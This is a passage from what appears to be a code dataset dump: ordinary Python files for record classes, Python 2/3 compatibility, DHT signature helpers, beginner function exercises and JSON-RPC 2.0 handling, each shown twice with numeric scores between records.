for attr in self.__slots__})
def __deepcopy__(self, memo):
return type(self)(**{attr: copy.deepcopy(getattr(self, attr), memo)
for attr in self.__slots__})
def __getstate__(self):
"""Get the current state of all attributes."""
return {attr: getattr(self, attr) for attr in type(self).__slots__}
def __setstate__(self, state):
"""Set the state of attributes."""
for attr, value in state.iteritems():
setattr(self, attr, value)
class HashableRecordClass(RecordClass):
"""Hashable version of RecordClass.
Use this when the record is considered immutable enough to be hashable.
Immutability is not enforced, but is recommended.
Do not use if the record or any of its fields' values will ever be modified.
"""
def __hash__(self):
return hash(
tuple(hash(getattr(self, attr)) for attr in self.__slots__))
class RecordMeta(type):
def __new__(cls, name, bases, attrs):
required_attributes = [] # Combine the bases' req attrs first.
attrs['optional_attributes'] = attrs.get('optional_attributes', {})
for base in bases:
if issubclass(base, RecordClass):
# Check for repeated attributes first.
repeats = (set(required_attributes) &
set(base.required_attributes))
assert not repeats, 'Required attributes clash: %s' % repeats
repeats = (set(attrs['optional_attributes']) &
set(base.optional_attributes))
assert not repeats, 'Optional attributes clash: %s' % repeats
required_attributes.extend(base.required_attributes)
attrs['optional_attributes'].update(base.optional_attributes)
# If this class defines any attributes in a superclass's
# required attributes, make it an optional attribute with a
# default with the given value.
provided = set(base.required_attributes) & set(attrs)
for attr in provided:
required_attributes.remove(attr)
attrs['optional_attributes'][attr] = attrs.pop(attr)
# Allow the class to override optional attribute defaults
# as well.
provided = set(base.optional_attributes) & set(attrs)
for attr in provided:
attrs['optional_attributes'][attr] = attrs.pop(attr)
attrs['required_attributes'] = tuple(
required_attributes + list(attrs.get('required_attributes', ())))
attrs['__slots__'] = (tuple(attrs['required_attributes']) +
tuple(attrs['optional_attributes'].keys()))
return super(RecordMeta, cls).__new__(cls, name, bases, attrs)
def __str__(cls):
return '<Record: %s>' % cls.__name__
__repr__ = __str__
def __eq__(cls, other):
if not isinstance(other, RecordMeta):
return False
return (
cls is other
or cls.required_attributes == other.required_attributes
and cls.optional_attributes == other.optional_attributes)
def __ne__(self, other):
return not self == other
def __hash__(cls):
return hash(
(cls.required_attributes,
frozenset(cls.optional_attributes.items())))
@property
def all_attribute_names(cls):
return itertools.chain(
cls.required_attributes,
cls.optional_attributes.keys())
def Record(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
cls = RecordMeta(cls_name, (RecordClass,), attrs)
# Copied from collections.py, the bottom of namedtuple:
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example).
if hasattr(sys, '_getframe'):
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
return cls
def HashableRecord(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
return RecordMeta(cls_name, (HashableRecordClass,), attrs)
def CopyRecord(record, **field_overrides):
"""Copies a record and its fields, recurses for any field that is a Record.
For records that have nested mutable fields, use copy.deepcopy.
Args:
record: A Record instance to be copied.
**field_overrides: Fields and their values to override in the new copy.
Returns: A copy of the given record with any fields overridden.
"""
fields = field_overrides
for field in record.__slots__:
if field in field_overrides:
continue
value = getattr(record, field)
if isinstance(value, RecordClass):
# Recurse for records.
new_value = CopyRecord(value)
else:
new_value = copy.copy(value)
fields[field] = new_value
return type(record)(**fields)
|
mutablerecords/records.py
|
import copy
import itertools
import sys
class RecordClass(object):
__slots__ = ()
required_attributes = ()
optional_attributes = {}
def __init__(self, *args, **kwargs):
# First, check for the maximum number of arguments.
required_attributes = type(self).required_attributes
if len(args) + len(kwargs.keys()) < len(required_attributes):
raise ValueError(
'Invalid arguments', type(self), args, kwargs, self.__slots__)
# Second, check if there are any overlapping arguments.
conflicts = (frozenset(kwargs.keys()) &
frozenset(required_attributes[:len(args)]))
if conflicts:
raise TypeError(
'Keyword arguments conflict with positional arguments: %s',
conflicts)
# Third, check all required attributes are provided.
required_kwargs = set(kwargs.keys()) & set(required_attributes)
num_provided = len(args) + len(required_kwargs)
if num_provided != len(required_attributes):
raise TypeError(
'__init__ takes exactly %d arguments but %d were given: %s' % (
len(required_attributes), num_provided,
required_attributes))
for slot, arg in itertools.chain(
zip(type(self).required_attributes, args), kwargs.items()):
object.__setattr__(self, slot, arg)
# Set defaults.
for attr, value in type(self).optional_attributes.items():
if attr not in kwargs:
if callable(value):
value = value()
object.__setattr__(self, attr, value)
def __str__(self):
return self._str(type(self).all_attribute_names)
def _str(self, str_attrs):
attrs = []
for attr in str_attrs:
attrs.append('%s=%s' % (attr, repr(getattr(self, attr))))
return '%s(%s)' % (type(self).__name__, ', '.join(attrs))
__repr__ = __str__
def __eq__(self, other):
return (
self is other
or type(self) == type(other)
and self._isequal_fields(other, self.__slots__))
def __ne__(self, other):
return not self == other
def _isequal_fields(self, other, fields):
return all(getattr(self, attr) == getattr(other, attr)
for attr in fields)
def __copy__(self):
return type(self)(**{attr: getattr(self, attr)
for attr in self.__slots__})
def __deepcopy__(self, memo):
return type(self)(**{attr: copy.deepcopy(getattr(self, attr), memo)
for attr in self.__slots__})
def __getstate__(self):
"""Get the current state of all attributes."""
return {attr: getattr(self, attr) for attr in type(self).__slots__}
def __setstate__(self, state):
"""Set the state of attributes."""
for attr, value in state.iteritems():
setattr(self, attr, value)
class HashableRecordClass(RecordClass):
"""Hashable version of RecordClass.
Use this when the record is considered immutable enough to be hashable.
Immutability is not enforced, but is recommended.
Do not use if the record or any of its fields' values will ever be modified.
"""
def __hash__(self):
return hash(
tuple(hash(getattr(self, attr)) for attr in self.__slots__))
class RecordMeta(type):
def __new__(cls, name, bases, attrs):
required_attributes = [] # Combine the bases' req attrs first.
attrs['optional_attributes'] = attrs.get('optional_attributes', {})
for base in bases:
if issubclass(base, RecordClass):
# Check for repeated attributes first.
repeats = (set(required_attributes) &
set(base.required_attributes))
assert not repeats, 'Required attributes clash: %s' % repeats
repeats = (set(attrs['optional_attributes']) &
set(base.optional_attributes))
assert not repeats, 'Optional attributes clash: %s' % repeats
required_attributes.extend(base.required_attributes)
attrs['optional_attributes'].update(base.optional_attributes)
# If this class defines any attributes in a superclass's
# required attributes, make it an optional attribute with a
# default with the given value.
provided = set(base.required_attributes) & set(attrs)
for attr in provided:
required_attributes.remove(attr)
attrs['optional_attributes'][attr] = attrs.pop(attr)
# Allow the class to override optional attribute defaults
# as well.
provided = set(base.optional_attributes) & set(attrs)
for attr in provided:
attrs['optional_attributes'][attr] = attrs.pop(attr)
attrs['required_attributes'] = tuple(
required_attributes + list(attrs.get('required_attributes', ())))
attrs['__slots__'] = (tuple(attrs['required_attributes']) +
tuple(attrs['optional_attributes'].keys()))
return super(RecordMeta, cls).__new__(cls, name, bases, attrs)
def __str__(cls):
return '<Record: %s>' % cls.__name__
__repr__ = __str__
def __eq__(cls, other):
if not isinstance(other, RecordMeta):
return False
return (
cls is other
or cls.required_attributes == other.required_attributes
and cls.optional_attributes == other.optional_attributes)
def __ne__(self, other):
return not self == other
def __hash__(cls):
return hash(
(cls.required_attributes,
frozenset(cls.optional_attributes.items())))
@property
def all_attribute_names(cls):
return itertools.chain(
cls.required_attributes,
cls.optional_attributes.keys())
def Record(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
cls = RecordMeta(cls_name, (RecordClass,), attrs)
# Copied from collections.py, the bottom of namedtuple:
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example).
if hasattr(sys, '_getframe'):
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
return cls
def HashableRecord(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
return RecordMeta(cls_name, (HashableRecordClass,), attrs)
def CopyRecord(record, **field_overrides):
"""Copies a record and its fields, recurses for any field that is a Record.
For records that have nested mutable fields, use copy.deepcopy.
Args:
record: A Record instance to be copied.
**field_overrides: Fields and their values to override in the new copy.
Returns: A copy of the given record with any fields overridden.
"""
fields = field_overrides
for field in record.__slots__:
if field in field_overrides:
continue
value = getattr(record, field)
if isinstance(value, RecordClass):
# Recurse for records.
new_value = CopyRecord(value)
else:
new_value = copy.copy(value)
fields[field] = new_value
return type(record)(**fields)
| 0.604399 | 0.14448 |
import sys
PY2 = sys.version_info[0] == 2
def _identity(x): # pragma: no cover
return x
__all__ = [
'BytesIO',
'PY2',
'StringIO',
'ascii_lowercase',
'cmp',
'configparser',
'console_to_str',
'imap',
'input',
'integer_types',
'iteritems',
'iterkeys',
'itervalues',
'izip',
'number_types',
'pickle',
'range_type',
'reraise',
'string_types',
'text_to_native',
'text_type',
'unichr',
'urllib',
'urlparse',
'urlparse',
'urlretrieve',
'_identity',
]
if PY2: # pragma: no cover
unichr = unichr
text_type = unicode
string_types = (str, unicode)
integer_types = (int, long)
from urllib import urlretrieve
def text_to_native(s, enc):
return s.encode(enc)
def iterkeys(d):
return d.iterkeys()
def itervalues(d):
return d.itervalues()
def iteritems(d):
return d.iteritems()
from cStringIO import StringIO as BytesIO
from StringIO import StringIO
import cPickle as pickle
import ConfigParser as configparser
from itertools import izip, imap
range_type = xrange
cmp = cmp
input = raw_input
from string import lower as ascii_lowercase
import urlparse
def console_to_str(s):
return s.decode('utf_8')
exec('def reraise(tp, value, tb=None):\n raise tp, value, tb')
else: # pragma: no cover
unichr = chr
text_type = str
string_types = (str,)
integer_types = (int, )
def text_to_native(s, enc):
return s
def iterkeys(d):
return iter(d.keys())
def itervalues(d):
return iter(d.values())
def iteritems(d):
return iter(d.items())
from io import StringIO
from io import BytesIO
import pickle
import configparser
izip = zip
imap = map
range_type = range
def cmp(a, b):
return (a > b) - (a < b)
input = input
from string import ascii_lowercase
import urllib.parse as urllib
import urllib.parse as urlparse
from urllib.request import urlretrieve
console_encoding = sys.__stdout__.encoding
def console_to_str(s):
''' From pypa/pip project, pip.backwardwardcompat. License MIT. '''
try:
return s.decode(console_encoding)
except UnicodeDecodeError:
return s.decode('utf_8')
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise(value.with_traceback(tb))
raise value
number_types = integer_types + (float,)
|
mt940/_compat.py
|
import sys
PY2 = sys.version_info[0] == 2
def _identity(x): # pragma: no cover
return x
__all__ = [
'BytesIO',
'PY2',
'StringIO',
'ascii_lowercase',
'cmp',
'configparser',
'console_to_str',
'imap',
'input',
'integer_types',
'iteritems',
'iterkeys',
'itervalues',
'izip',
'number_types',
'pickle',
'range_type',
'reraise',
'string_types',
'text_to_native',
'text_type',
'unichr',
'urllib',
'urlparse',
'urlparse',
'urlretrieve',
'_identity',
]
if PY2: # pragma: no cover
unichr = unichr
text_type = unicode
string_types = (str, unicode)
integer_types = (int, long)
from urllib import urlretrieve
def text_to_native(s, enc):
return s.encode(enc)
def iterkeys(d):
return d.iterkeys()
def itervalues(d):
return d.itervalues()
def iteritems(d):
return d.iteritems()
from cStringIO import StringIO as BytesIO
from StringIO import StringIO
import cPickle as pickle
import ConfigParser as configparser
from itertools import izip, imap
range_type = xrange
cmp = cmp
input = raw_input
from string import lower as ascii_lowercase
import urlparse
def console_to_str(s):
return s.decode('utf_8')
exec('def reraise(tp, value, tb=None):\n raise tp, value, tb')
else: # pragma: no cover
unichr = chr
text_type = str
string_types = (str,)
integer_types = (int, )
def text_to_native(s, enc):
return s
def iterkeys(d):
return iter(d.keys())
def itervalues(d):
return iter(d.values())
def iteritems(d):
return iter(d.items())
from io import StringIO
from io import BytesIO
import pickle
import configparser
izip = zip
imap = map
range_type = range
def cmp(a, b):
return (a > b) - (a < b)
input = input
from string import ascii_lowercase
import urllib.parse as urllib
import urllib.parse as urlparse
from urllib.request import urlretrieve
console_encoding = sys.__stdout__.encoding
def console_to_str(s):
''' From pypa/pip project, pip.backwardwardcompat. License MIT. '''
try:
return s.decode(console_encoding)
except UnicodeDecodeError:
return s.decode('utf_8')
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise(value.with_traceback(tb))
raise value
number_types = integer_types + (float,)
| 0.233619 | 0.238683 |
from socket import inet_aton
from struct import pack, unpack
from types import IntType, StringType, TupleType
from ncrypt.digest import DigestType, Digest
from ncrypt.rsa import RSAKey, RSAError
from nitro.bencode import encode
from cspace.dht.params import DHT_ID_LENGTH, DHT_ID_MAX
digestType = DigestType( 'SHA1' )
digestLength = digestType.size()
assert digestLength == DHT_ID_LENGTH
def toId( x ) :
return Digest(digestType).digest(x)
def idToNum( x ) :
return long(x.encode('hex'),16)
def numToId( numId ) :
s = hex( numId )
assert s.startswith('0x')
if s.endswith('L') : s = s[2:-1]
else : s = s[2:]
if len(s) < 2*DHT_ID_LENGTH :
s = ('0'*(2*DHT_ID_LENGTH-len(s))) + s
x = s.decode('hex')
assert len(x) == DHT_ID_LENGTH
return x
def checkIP( ip ) :
if type(ip) is not StringType : return False
if not ip : return False
try :
inet_aton( ip )
return True
except :
return False
def checkPort( port ) :
if type(port) is not IntType : return False
return 0 < port < 65536
def checkAddr( addr ) :
if type(addr) is not TupleType :
return False
if len(addr) != 2 : return False
if not checkIP(addr[0]) : return False
return checkPort( addr[1] )
def addrToStr( addr ) :
ip = unpack( 'L', inet_aton(addr[0]) )[0]
port = addr[1]
return pack( '!LH', ip, port )
def addrToId( addr ) :
return toId( addrToStr(addr) )
def verifySignature( publicKey, data, updateLevel, signature ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
if type(publicKey) is str :
k = RSAKey()
try :
k.fromDER_PublicKey( publicKey )
except RSAError :
return False
else :
k = publicKey
try :
digest = Digest(digestType).digest( payload )
k.verify( signature, digest, digestType )
return True
except RSAError :
return False
def computeSignature( rsaKey, data, updateLevel ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
digest = Digest(digestType).digest( payload )
return rsaKey.sign( digest, digestType )
|
cspace/dht/util.py
|
from socket import inet_aton
from struct import pack, unpack
from types import IntType, StringType, TupleType
from ncrypt.digest import DigestType, Digest
from ncrypt.rsa import RSAKey, RSAError
from nitro.bencode import encode
from cspace.dht.params import DHT_ID_LENGTH, DHT_ID_MAX
digestType = DigestType( 'SHA1' )
digestLength = digestType.size()
assert digestLength == DHT_ID_LENGTH
def toId( x ) :
return Digest(digestType).digest(x)
def idToNum( x ) :
return long(x.encode('hex'),16)
def numToId( numId ) :
s = hex( numId )
assert s.startswith('0x')
if s.endswith('L') : s = s[2:-1]
else : s = s[2:]
if len(s) < 2*DHT_ID_LENGTH :
s = ('0'*(2*DHT_ID_LENGTH-len(s))) + s
x = s.decode('hex')
assert len(x) == DHT_ID_LENGTH
return x
def checkIP( ip ) :
if type(ip) is not StringType : return False
if not ip : return False
try :
inet_aton( ip )
return True
except :
return False
def checkPort( port ) :
if type(port) is not IntType : return False
return 0 < port < 65536
def checkAddr( addr ) :
if type(addr) is not TupleType :
return False
if len(addr) != 2 : return False
if not checkIP(addr[0]) : return False
return checkPort( addr[1] )
def addrToStr( addr ) :
ip = unpack( 'L', inet_aton(addr[0]) )[0]
port = addr[1]
return pack( '!LH', ip, port )
def addrToId( addr ) :
return toId( addrToStr(addr) )
def verifySignature( publicKey, data, updateLevel, signature ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
if type(publicKey) is str :
k = RSAKey()
try :
k.fromDER_PublicKey( publicKey )
except RSAError :
return False
else :
k = publicKey
try :
digest = Digest(digestType).digest( payload )
k.verify( signature, digest, digestType )
return True
except RSAError :
return False
def computeSignature( rsaKey, data, updateLevel ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
digest = Digest(digestType).digest( payload )
return rsaKey.sign( digest, digestType )
| 0.351089 | 0.379723 |
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range (5):
result = dice(5)
print(result)
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range(5):
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
print(f"{dice1} and {dice2} de kaikei {sum}")
# =============================================================================
# Pg 235
def mile2meter(mile):
meter = mile * 1609.344
return meter
distance = mile2meter(20)
print(distance)
print(mile2meter(30))
# =============================================================================
# Pg236
def triangle(base, height):
area = base * height / 2
return area
b = 15
h = 13
v = triangle(b, h)
print(f"底辺{b}、高さ{h}の参画型の面積は {v :.1f}です。")
# =============================================================================
# Pg237
from random import randint
def dice():
num = randint(1, 6)
return num
def dicegame():
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
if sum%2 == 0:
print(f"{dice1}と{dice2}で合計{sum}、 偶数")
else:
print(f"{dice1}と{dice2}で合計は{sum}、奇数")
for i in range(5):
dicegame()
print("ゲーム終了")
# Pg 238
def calc(num):
unit_price = 180
if not num.isdigit():
return None
price = int(num) * unit_price
return price
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =========================================================================
# 07/16 復習
# 関数とは 。。。 処理の集まりです
# 繰り返しと使用する。
# 処理をまとめ
# 戻り値: 関数の処理結果
# 引数: 関数を呼び出す時使用する値
#
# foo bar baz
# hoge fuga piyo
#
# 復讐問題0716
def addition(n1, n2):
return n1 + n2
value = addition(10,20)
print(value)
def calc(operator, n1, n2):
if operator == 1:
return n1 + n2
if operator == 2:
return n1 - n2
if operator == 3:
return n1 * n2
if operator == 4:
return n1 / n2
else:
print("Enter digits")
x = calc("a", 2, 3)
print("result:", x)
# Using dictionay instead of if
def calc2(ope, n1, n2):
return {
1: n1 + n2,
2: n1 - n2,
3: n1 * n2,
4: n1 / n2
}.get(ope)
y = calc2(1, 4, 5)
print(y)
# because is not returning a value, as the funtion is called, it will print
# and x will be none, can't s
def sum(n1, n2):
print(n1 + n2)
x = sum(1, 2)
print("x",x)
def compare(n1, n2):
if n1 == n2:
return True
else:
return False
x = compare(1, 1)
print(x)
# =============================================================================
# Pg239
def calc(num):
unit_price = 180
try:
num = float(num)
return num * unit_price
except:
return None
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =============================================================================
# Pg240
# 有効範囲
v = 2 # グローバル変数
def calc():
# v = 2 # ローカル変数
# v = v * 10 (UnboundLocalError: local variable 'v' referenced before assignment) it's trying to make a calculation before it know's it's value
# v = 1 CAN reassign variable
x = v * 10
ans = 3 * x
print(ans)
calc()
print(v)
|
class-notes/chapter_10/c10-1.py
|
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range (5):
result = dice(5)
print(result)
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range(5):
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
print(f"{dice1} and {dice2} de kaikei {sum}")
# =============================================================================
# Pg 235
def mile2meter(mile):
meter = mile * 1609.344
return meter
distance = mile2meter(20)
print(distance)
print(mile2meter(30))
# =============================================================================
# Pg236
def triangle(base, height):
area = base * height / 2
return area
b = 15
h = 13
v = triangle(b, h)
print(f"底辺{b}、高さ{h}の参画型の面積は {v :.1f}です。")
# =============================================================================
# Pg237
from random import randint
def dice():
num = randint(1, 6)
return num
def dicegame():
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
if sum%2 == 0:
print(f"{dice1}と{dice2}で合計{sum}、 偶数")
else:
print(f"{dice1}と{dice2}で合計は{sum}、奇数")
for i in range(5):
dicegame()
print("ゲーム終了")
# Pg 238
def calc(num):
unit_price = 180
if not num.isdigit():
return None
price = int(num) * unit_price
return price
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =========================================================================
# 07/16 復習
# 関数とは 。。。 処理の集まりです
# 繰り返しと使用する。
# 処理をまとめ
# 戻り値: 関数の処理結果
# 引数: 関数を呼び出す時使用する値
#
# foo bar baz
# hoge fuga piyo
#
# 復讐問題0716
def addition(n1, n2):
return n1 + n2
value = addition(10,20)
print(value)
def calc(operator, n1, n2):
if operator == 1:
return n1 + n2
if operator == 2:
return n1 - n2
if operator == 3:
return n1 * n2
if operator == 4:
return n1 / n2
else:
print("Enter digits")
x = calc("a", 2, 3)
print("result:", x)
# Using dictionay instead of if
def calc2(ope, n1, n2):
return {
1: n1 + n2,
2: n1 - n2,
3: n1 * n2,
4: n1 / n2
}.get(ope)
y = calc2(1, 4, 5)
print(y)
# because is not returning a value, as the funtion is called, it will print
# and x will be none, can't s
def sum(n1, n2):
print(n1 + n2)
x = sum(1, 2)
print("x",x)
def compare(n1, n2):
if n1 == n2:
return True
else:
return False
x = compare(1, 1)
print(x)
# =============================================================================
# Pg239
def calc(num):
unit_price = 180
try:
num = float(num)
return num * unit_price
except:
return None
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =============================================================================
# Pg240
# 有効範囲
v = 2 # グローバル変数
def calc():
# v = 2 # ローカル変数
# v = v * 10 (UnboundLocalError: local variable 'v' referenced before assignment) it's trying to make a calculation before it know's it's value
# v = 1 CAN reassign variable
x = v * 10
ans = 3 * x
print(ans)
calc()
print(v)
| 0.236957 | 0.211987 |
import json
class RPCObject:
"""Just group of other classes"""
__slots__ = ()
class RPCError(BaseException, RPCObject):
"""JSON-RPC 2.0 error object"""
__slots__ = 'code', 'message', 'data'
def __init__(self, code, message='error', data=None):
self.code, self.message, self.data = code, message, data
def __repr__(self):
return '<JSON-RPC 2.0 Error [{}]: {} - "{}">'.format(self.code, self.message, self.data)
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(code=self.code, message=self.message)
if self.data is not None:
d['data'] = self.data
return d
def add_data(self, data):
"""Create copy of object with data added"""
return type(self).__call__(self.code, self.message, data)
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
return cls(d['code'], d['message'], d.get('data'))
PARSE_ERROR = RPCError(-32700, 'Parse error')
INVALID_REQUEST_ERROR = RPCError(-32600, 'Invalid Request')
METHOD_NOT_FOUND_ERROR = RPCError(-32601, 'Method not found')
INVALID_PARAMS_ERROR = RPCError(-32602, 'Invalid params')
INTERNAL_ERROR = RPCError(-32603, 'Internal error')
SERVER_ERROR = RPCError(-32000, 'Server error')
class RPCRequest(RPCObject):
"""JSON-RPC 2.0 request/notification object"""
__slots__ = 'id', 'method', 'params'
def __init__(self, method, params, id=None):
assert isinstance(method, str), '"method" MUST be str'
assert isinstance(params, (tuple, list, dict)) or params is None, '"params" MUST be tuple, list, dict or None'
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.method, self.params, self.id = method, params, id
def __repr__(self):
return f'<JSON-RPC 2.0 Request [{self.id}]: {self.method}({self.params})>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', method=self.method, params=self.params)
if self.id is not None:
d['id'] = self.id
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
return cls(d['method'], d['params'], d.get('id'))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCResponse(RPCObject):
"""JSON-RPC 2.0 response object"""
__slots__ = 'id', 'result', 'error'
def __init__(self, id, result):
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.id = id
if isinstance(result, RPCError):
self.error, self.result = result, None
else:
self.error, self.result = None, result
def __repr__(self):
return f'<JSON-RPC 2.0 Request [{self.id}]: {self.error if self.result is None else self.result}>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', id=self.id)
if self.error is not None:
d['error'] = self.error.to_dict()
if self.result is not None:
d['result'] = self.result
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
result = d.get('result')
error = d.get('error')
if (result is not None and error is not None) or (result is None and error is None):
raise INVALID_REQUEST_ERROR.add_data('MUST contain result XOR error')
return cls(d['id'], result if error is None else RPCError.from_dict(error))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCDispatcher:
"""Get decoded requests and return results (success or error) from corresponding methods"""
def __init__(self, methods):
self.methods = methods if isinstance(methods, dict) else {func.__name__: func for func in methods}
def dispatch(self, request):
"""Check if request is correct, execute RPC method and return response"""
func = self.methods.get(request.method)
if func is None:
return None if request.id is None else RPCResponse(request.id, METHOD_NOT_FOUND_ERROR)
else:
try:
result = func(**request.params) if isinstance(request.params, dict) else func(*request.params)
return None if request.id is None else RPCResponse(request.id, result)
except TypeError as e:
return None if request.id is None else RPCResponse(request.id, INVALID_PARAMS_ERROR.add_data(str(e)))
except BaseException as e:
return None if request.id is None else RPCResponse(request.id, INTERNAL_ERROR.add_data(str(e)))
class RPCSerializer:
"""Methods to serialize and deserialize JSON-RPC objects"""
def __init__(self, ensure_ascii=True, length_bytes=None, order='big', separator=b''):
self.ensure_ascii, self.length_bytes, self.separator, self.order = ensure_ascii, length_bytes, separator, order
def to_bytes(self, obj):
"""Serialize JSON-RPC object to bytes"""
try:
return json.dumps(obj.to_dict(), separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
except BaseException:
packed = json.dumps(RPCResponse(obj.id, INTERNAL_ERROR),
separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
return b''.join((len(packed).to_bytes(self.length_bytes, self.order) if self.length_bytes else b'',
packed, self.separator))
def from_bytes(self, raw):
"""Extract JSON-RPC objects from byte string"""
res = list()
try:
data = json.loads(raw.decode())
if not isinstance(data, list):
data = (data, )
for d in data:
try:
if not isinstance(d, dict):
res.append(INVALID_REQUEST_ERROR.add_data('Not object'))
if 'jsonrpc' not in d:
res.append(INVALID_REQUEST_ERROR.add_data('No "jsonrpc" key'))
if d['jsonrpc'] != '2.0':
res.append(INVALID_REQUEST_ERROR.add_data('JSON-RPC version != 2.0'))
if 'method' in d:
res.append(RPCRequest.from_dict(d))
elif 'result' in d or 'error' in d:
res.append(RPCResponse.from_dict(d))
else:
res.append(INVALID_REQUEST_ERROR.add_data('Not request or response'))
except RPCError as e:
res.append(e)
except BaseException as e:
res.append(SERVER_ERROR)
except json.JSONDecodeError:
res.append(PARSE_ERROR.add_data('JSON error'))
except UnicodeDecodeError:
res.append(PARSE_ERROR.add_data('UTF-8 error'))
except BaseException:
res.append(SERVER_ERROR)
return res
|
dcnnt/common/jsonrpc.py
|
import json
class RPCObject:
"""Just group of other classes"""
__slots__ = ()
class RPCError(BaseException, RPCObject):
"""JSON-RPC 2.0 error object"""
__slots__ = 'code', 'message', 'data'
def __init__(self, code, message='error', data=None):
self.code, self.message, self.data = code, message, data
def __repr__(self):
return '<JSON-RPC 2.0 Error [{}]: {} - "{}">'.format(self.code, self.message, self.data)
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(code=self.code, message=self.message)
if self.data is not None:
d['data'] = self.data
return d
def add_data(self, data):
"""Create copy of object with data added"""
return type(self).__call__(self.code, self.message, data)
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
return cls(d['code'], d['message'], d.get('data'))
PARSE_ERROR = RPCError(-32700, 'Parse error')
INVALID_REQUEST_ERROR = RPCError(-32600, 'Invalid Request')
METHOD_NOT_FOUND_ERROR = RPCError(-32601, 'Method not found')
INVALID_PARAMS_ERROR = RPCError(-32602, 'Invalid params')
INTERNAL_ERROR = RPCError(-32603, 'Internal error')
SERVER_ERROR = RPCError(-32000, 'Server error')
class RPCRequest(RPCObject):
"""JSON-RPC 2.0 request/notification object"""
__slots__ = 'id', 'method', 'params'
def __init__(self, method, params, id=None):
assert isinstance(method, str), '"method" MUST be str'
assert isinstance(params, (tuple, list, dict)) or params is None, '"params" MUST be tuple, list, dict or None'
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.method, self.params, self.id = method, params, id
def __repr__(self):
return f'<JSON-RPC 2.0 Request [{self.id}]: {self.method}({self.params})>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', method=self.method, params=self.params)
if self.id is not None:
d['id'] = self.id
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
return cls(d['method'], d['params'], d.get('id'))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCResponse(RPCObject):
"""JSON-RPC 2.0 response object"""
__slots__ = 'id', 'result', 'error'
def __init__(self, id, result):
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.id = id
if isinstance(result, RPCError):
self.error, self.result = result, None
else:
self.error, self.result = None, result
def __repr__(self):
return f'<JSON-RPC 2.0 Request [{self.id}]: {self.error if self.result is None else self.result}>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', id=self.id)
if self.error is not None:
d['error'] = self.error.to_dict()
if self.result is not None:
d['result'] = self.result
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
result = d.get('result')
error = d.get('error')
if (result is not None and error is not None) or (result is None and error is None):
raise INVALID_REQUEST_ERROR.add_data('MUST contain result XOR error')
return cls(d['id'], result if error is None else RPCError.from_dict(error))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCDispatcher:
"""Get decoded requests and return results (success or error) from corresponding methods"""
def __init__(self, methods):
self.methods = methods if isinstance(methods, dict) else {func.__name__: func for func in methods}
def dispatch(self, request):
"""Check if request is correct, execute RPC method and return response"""
func = self.methods.get(request.method)
if func is None:
return None if request.id is None else RPCResponse(request.id, METHOD_NOT_FOUND_ERROR)
else:
try:
